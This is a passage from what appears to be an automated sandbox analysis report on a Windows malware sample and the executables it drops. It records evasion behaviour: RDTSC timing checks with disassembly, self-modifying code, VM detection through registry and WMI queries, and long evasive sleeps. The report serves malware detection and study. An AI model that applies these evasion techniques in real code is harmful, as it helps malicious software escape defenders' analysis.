Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A01F9 second address: 54A0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0208 second address: 54A0220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28984h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0220 second address: 54A027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F58F53CD38Ch 0x00000012 xchg eax, edi 0x00000013 jmp 00007F58F53CD390h 0x00000018 push eax 0x00000019 jmp 00007F58F53CD38Bh 0x0000001e xchg eax, edi 0x0000001f jmp 00007F58F53CD396h 0x00000024 mov eax, 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov di, CB40h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A027C second address: 54A0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0281 second address: 54A031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lock cmpxchg dword ptr [esi], ecx 0x0000000e jmp 00007F58F53CD38Ah 0x00000013 mov ecx, eax 0x00000015 jmp 00007F58F53CD390h 0x0000001a cmp ecx, 01h 0x0000001d pushad 0x0000001e movzx ecx, dx 0x00000021 pushfd 0x00000022 jmp 00007F58F53CD393h 0x00000027 sbb si, 8E7Eh 0x0000002c jmp 00007F58F53CD399h 0x00000031 popfd 0x00000032 popad 0x00000033 jne 00007F5967C2F66Eh 0x00000039 pushad 0x0000003a mov edx, ecx 0x0000003c push esi 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 popad 0x00000041 pop edi 0x00000042 jmp 00007F58F53CD390h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F58F53CD397h 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A031F second address: 54A0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28982h 0x00000009 or ecx, 0B3D5638h 0x0000000f jmp 00007F58F4C2897Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov dh, 48h 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F58F4C28986h 0x00000028 add ch, FFFFFFC8h 0x0000002b jmp 00007F58F4C2897Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F58F4C28986h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0929 second address: 54A0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F58F53CD38Bh 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov al, 33h 0x00000010 mov dh, EFh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov cl, A2h 0x00000018 push ebx 0x00000019 jmp 00007F58F53CD38Eh 0x0000001e pop ecx 0x0000001f popad 0x00000020 push FFFFFFFEh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F58F53CD393h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0971 second address: 54A0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0975 second address: 54A097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A097B second address: 54A09A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 0121h 0x00000007 movzx esi, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 470BA478h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F58F4C28985h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A09A4 second address: 54A09FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F3h 0x00000005 pushfd 0x00000006 jmp 00007F58F53CD398h 0x0000000b and eax, 0333D848h 0x00000011 jmp 00007F58F53CD38Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a add dword ptr [esp], 30D11BA0h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov di, 92B6h 0x00000028 call 00007F58F53CD397h 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A09FE second address: 54A0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 435D8B55h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F58F4C28987h 0x00000015 sbb ecx, 17352D4Eh 0x0000001b jmp 00007F58F4C28989h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28980h 0x00000027 add eax, 15AD01C8h 0x0000002d jmp 00007F58F4C2897Bh 0x00000032 popfd 0x00000033 popad 0x00000034 add dword ptr [esp], 347622ABh 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov eax, edi 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0A87 second address: 54A0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD38Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0A9A second address: 54A0AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e pushad 0x0000000f push edx 0x00000010 mov eax, 548BD6EDh 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F58F4C28983h 0x0000001c sub ah, 0000001Eh 0x0000001f jmp 00007F58F4C28989h 0x00000024 popfd 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AE9 second address: 54A0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AED second address: 54A0AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AF3 second address: 54A0B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD391h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0B08 second address: 54A0B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0B0C second address: 54A0BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F58F53CD38Ch 0x0000000e nop 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007F58F53CD38Ch 0x00000016 pop eax 0x00000017 mov bx, A066h 0x0000001b popad 0x0000001c mov bl, 5Ch 0x0000001e popad 0x0000001f sub esp, 1Ch 0x00000022 pushad 0x00000023 mov di, ax 0x00000026 push ecx 0x00000027 pushfd 0x00000028 jmp 00007F58F53CD397h 0x0000002d sub si, CB9Eh 0x00000032 jmp 00007F58F53CD399h 0x00000037 popfd 0x00000038 pop eax 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007F58F53CD38Ah 0x00000041 mov si, F1F1h 0x00000045 popad 0x00000046 mov dword ptr [esp], ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F58F53CD399h 0x00000052 and ecx, 2501C336h 0x00000058 jmp 00007F58F53CD391h 0x0000005d popfd 0x0000005e mov edx, eax 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0BC6 second address: 54A0C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 4BBEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007F58F4C28980h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F58F4C28981h 0x00000018 sbb ah, FFFFFFF6h 0x0000001b jmp 00007F58F4C28981h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28980h 0x00000027 adc ah, 00000018h 0x0000002a jmp 00007F58F4C2897Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F58F4C28985h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C43 second address: 54A0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F58F53CD393h 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C72 second address: 54A0C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28980h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C86 second address: 54A0D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F53CD399h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F58F53CD38Eh 0x00000017 mov eax, dword ptr [77DEB370h] 0x0000001c pushad 0x0000001d mov eax, 188DD19Dh 0x00000022 mov bx, ax 0x00000025 popad 0x00000026 xor dword ptr [ebp-08h], eax 0x00000029 jmp 00007F58F53CD394h 0x0000002e xor eax, ebp 0x00000030 pushad 0x00000031 mov di, 3572h 0x00000035 pushfd 0x00000036 jmp 00007F58F53CD393h 0x0000003b sbb ax, CB6Eh 0x00000040 jmp 00007F58F53CD399h 0x00000045 popfd 0x00000046 popad 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F58F53CD393h 0x00000051 adc al, 0000007Eh 0x00000054 jmp 00007F58F53CD399h 0x00000059 popfd 0x0000005a mov ecx, 17ABFFC7h 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D5C second address: 54A0D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D62 second address: 54A0D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D66 second address: 54A0DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F4C28989h 0x00000011 nop 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 mov dx, C41Ch 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DA8 second address: 54A0DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DAC second address: 54A0DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DC8 second address: 54A0E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr fs:[00000000h], eax 0x00000010 jmp 00007F58F53CD399h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 jmp 00007F58F53CD38Eh 0x0000001d mov eax, dword ptr [esi+10h] 0x00000020 jmp 00007F58F53CD390h 0x00000025 test eax, eax 0x00000027 jmp 00007F58F53CD390h 0x0000002c jne 00007F5967C1C283h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: B12C9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: B103A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: CC0F53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: B72C9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: B703A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: D20F53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: 994D89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: 994E8A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: B3D7B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: B668AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: BCA4F7 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Code function: 10_2_054C094D rdtsc 10_2_054C094D
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4398 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4018 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5948 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3972 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\22.exe Window / User API: threadDelayed 412
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssisd.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\svchost015.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1] Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe API coverage: 3.9 %
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe API coverage: 9.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748 Thread sleep time: -18446744073709540s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5952 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep count: 175 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep time: -350175s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5300 Thread sleep count: 124 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5300 Thread sleep time: -248124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep count: 286 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep time: -8580000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5304 Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5304 Thread sleep time: -346173s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3280 Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3280 Thread sleep time: -376188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5488 Thread sleep count: 172 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5488 Thread sleep time: -344172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3488 Thread sleep count: 164 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3488 Thread sleep time: -328164s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5164 Thread sleep count: 199 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5164 Thread sleep time: -398199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5276 Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5276 Thread sleep time: -360180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7464 Thread sleep time: -150000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7468 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\22.exe TID: 7612 Thread sleep count: 412 > 30
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep count: 171 > 30
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep time: -5130000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
